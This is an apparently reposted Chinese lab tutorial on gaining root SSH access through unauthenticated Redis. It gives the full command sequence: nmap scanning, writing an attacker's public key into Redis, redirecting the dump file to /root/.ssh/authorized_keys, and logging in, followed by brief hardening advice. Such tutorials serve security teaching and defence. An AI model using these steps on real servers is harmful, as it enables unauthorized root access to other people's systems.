Kali Linux 利用Redis写入SHH公钥

标题：利用Redis写入SHH公钥 作者：Jhson 关键词：利用Redis写入SHH公钥,Kali Linux 难度：★★★★ 环境安装 -------------------------------------------------------- SSH客户端：Xshell 靶机系统：CentOS Redis版本：redis-2.8.3 -------------------------------------------------------- redis主要版本为2和3，安装与配置方法如下。 1. 下载redis，3.2或者2.8选一个 # wget http://download.redis.io/releases/redis-3.2.2.tar.gz # wget http://download.redis.io/releases/redis-2.8.3.tar.gz 这里以redis-2.8.3为例   2. 解压包 ? 1 #tar zxvf redis.2.8.3.tar.gz 3. 编译安装 ? 1 #cd ./redis2.8.3/src&&make 4. 启动redis并在后台运行格式：./redis-server [redis配置文件] ? 1 # ./redis-server ../redis.conf 5. 查看redis是否启动 ? 1 # netstat -ntlp | grep redis   利用姿势1、利用nmap获取redis信息 ? 1 # nmap -A -p6379 --script=redis-info 192.168.132.134   2、利用redis客户端进行未授权访问# ? 1 ./redis-cli -h 192.168.132.134 ? 1 192.168.132.134:6379> info   当然，如果redis存在访问密码的话，可以使用如下： ? 1 # ./redis-cli -h 192.168.132.134 –a [password] 3、利用redis连接写入ssh公钥1)先在攻击机上生成ssh公钥和私钥 ? 1 # ssh-keygen -t rsa 2)将公钥写入一个文本中 ? 1 # cd ~/.ssh/ ? 1 # (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> hack.txt 3)将hack.txt写入redis ? 1 # cat hack.txt | /usr/local/redis-2.8.3/src/./redis-cli -h 192.168.132.134 -x set crack 4)利用redis客户端连接靶机redis ? 1 # cd /usr/local/redis-2.8.3/src/ [ ? 1 # ./redis-cli -h 192.168.132.134 5)获取redis备份的路径 ? 1 192.168.132.134:6379> CONFIG GET dir 6)更改redis备份路径 ? 1 192.168.132.134:6379> CONFIG SET dir /root/.ssh 7)设置备份文件的名称为authorized_keys ? 1 192.168.132.134:6379> CONFIG SET dbfilename authorized_keys   8)检查是否更改 ? 1 192.168.132.134:6379> CONFIG GET dbfilename   9)保存 ? 1 192.168.132.134:6379> save   4. ssh连接 ? 1 # ssh [email]root@192.168.132.134[/email]   至此，攻击过程结束。防御加固1、限制redis访问 如果仅需要在本地访问redis，找到redis.conf配置文件设置bind配置项为：bind 127.0.0.1  保存，重启redis服务再次查看redis进程信息如下：  2、增加redis访问密码同上，在redis.conf配置文件中找到requirepass 配置项，取消#注释符，在requirepass 后面添加设置的密码   via:https://bbs.ichunqiu.com/thread-17634-1-1.html